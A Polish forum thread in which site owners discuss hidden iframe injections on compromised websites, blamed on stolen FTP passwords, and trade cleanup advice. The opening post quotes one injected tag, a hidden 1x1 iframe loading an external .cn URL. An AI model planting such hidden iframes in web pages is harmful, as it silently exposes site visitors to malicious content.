skąd sie biorą nagle wstawki iframe na stronie?

[rgt 0]

Witam.

 

Jak sądzę znajomi padli ofiarą kogoś "miłego" i pojawił się u nich w kodzie stron dodatkowy kod z iframe, np:

 

<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe>

Jak zaradzić na przyszłość takim sytuacjom?

To "wina" firmy hostingowej czy wina samego skryptu? (jeden przypadek to sklep z shoper.pl)

 

 

R.

[Gość Active-Hosting]

Poczytaj o wirusie przechwytującym hasła z TC przez złe szyfrowanie TC.

Zmień klienta FTP i poczekaj na nową wersje TC.

[Gość RuFiK]

1. skan komputerów ktore maja dostep do konta hostingowego

2. zmiana hasel na ftp

3. zglos do boku w celu wyciagniecia szczegolowych logow

4. glowa do gory

 

ps. jak nie piszesz komunikatu ze google blokneli www to jeszcze jest gut sytuacja

[rgt 0]

Czyli to raczej wynik dostępu do ftp (przechwycenie hasła)?

 

R.

[Gość RuFiK]

Tak

[rgt 0]

A co jeśli Google już ma na swojej "czarnej liście"?

[Gość RuFiK]

sprawdz skrzynke mail admin@domena google z automatu wysyla powiadomienie i jakie nalezy podjac kroki zeby bloka zostala usunieta.

 

pzdr.

[xorg 693]

http://cs-puchatek.pl/topics189/wirusy-na-...for-vt22181.htm

 

Tutaj conieco opisałem.

[Konrad Z. 1]

Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych

[Gość RuFiK]

Moze to tez byc wynik tego, ze strona nie jest zabezpieczona przed atakiem HTML insertion i ktos wrzucil HTML do bazy danych

 

watpie ... mialem statyczna strone i bot podmienil mi plik index.html .... via ftp

[Edart 239]

1. skan komputerów ktore maja dostep do konta hostingowego

2. zmiana hasel na ftp

3. zglos do boku w celu wyciagniecia szczegolowych logow

4. glowa do gory

 

1. ok

2. ok - dodatkowo: nie zapisywać hasła

3. do niczego się nie przyda

4. a nawet wyżej

 

najprostsza metoda na pozbycie się wrzoda i w dodatku skuteczna

[Malitek 1]

Antywir: http://download.eset.com/eval/win/eav/eav_nt32_plk.msi Napisz na PW a dam licencje do 23 lipca

 

Wykrywa ten shit.. Jak usuniesz i znów podczas przeglądania Nod da komunikat o wirusie sprawdź jeszcze raz ..

 

Ja miałem tak że pododawał się 25 kwietnia (w Total Comanderze data edycji .. ) usunąłem ( był backuz z dnia poprzedniego)

 

I po 2 dniach znowu komunikat jak do PA wbijałem no to hmm lukam a tu plik miał to wpisane nie 25 kwietnia a 14 + nie na końcu a pośrodku ..

[verde 4]

Moj kolega mial identyczny przypadek dodany wlasnei podobny wpis. Antywir , po wejsciu an stronei wykrywal ze na strone jest robak

Wystarczylo

Przeskanowac komuter skasowac kod na stronei zmienci hasla do serwera ftp, od miesiaca jest poprawana sytuacja .

[Malitek 1]

Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol ']

[kacka 0]

Również zapisywanie haseł w filezilla nie jest bezpieczne.

[rgt 0]

Udało się wszystko poukładać, nawet z gogle

Dzięki za odzew.

[Malas 0]

Za każdym razem jak skończycie coś robić na FTP wejść do totala i zmienić hasło na lol ']

kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftp

[p 3]

kto jeszcze z tego starocia korzysta, można choćby z fireftp w firefoxie korzystać i nie ma zabawy w zmianie haseł po każdorazowym użytku ftp

Starocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu...

[Malas 0]

Starocia? Pokaż mi lepszy menadżer plików pod Windowsa... No i jakby umknęło to Twojej uwadze, to Total Commander nie jest tylko klientem FTP, więc sugerowanie śmiesznych dodatków do Firefox'a jest co najmniej bez sensu...

Fakt tu masz rację, chodziło mi tylko i wyłącznie o usługę FTP w TC. Czemu śmiesznych?Jest bynajmniej bezpieczny.

Tak to jest z popularnymi programami.

[herki 0]

nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla

[p 3]

Czemu śmiesznych?Jest bynajmniej bezpieczny.

Skoro jest dodatkiem do Firefox'a, to musi być śmieszny

[Malas 0]

nie nalezy takze zapisywac hasel w Fireftp w Firefox'ie poniewaz z tamtad tez kradnie loginy i hasla

jeżeli ktoś nie umie się zabezpieczyć.

 

p : takie tezy to wiesz.

[kafi 2425]

Już tak nie idealizuj swojego ulubionego Firefoksa.

 

jeżeli ktoś nie umie się zabezpieczyć.

Jeżeli ktoś umie się solidnie zabezpieczać, to nawet Total Commander jest dla niego bezpieczny.

A jeżeli nie umie - to Fx jest równie dziurawy, jak TC.

[is_wm 287]

A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ?

[beliq 442]

A czy ma ktos w miare gotowe rozwiazanie do zabezpieczenia od strony serwera? Cos na wzor daemona (np) ktory sprawdza/filtruje dane przesylane przez Ftp ?

 

 

Istnieje taka możliwość, nie mniej jednak wdrożenie tego nie jest proste,

 

a overhead jest jednak odczuwalny, bo daemon musi po przesłaniu każdego pliku

 

 

przeparsować jego zawartość...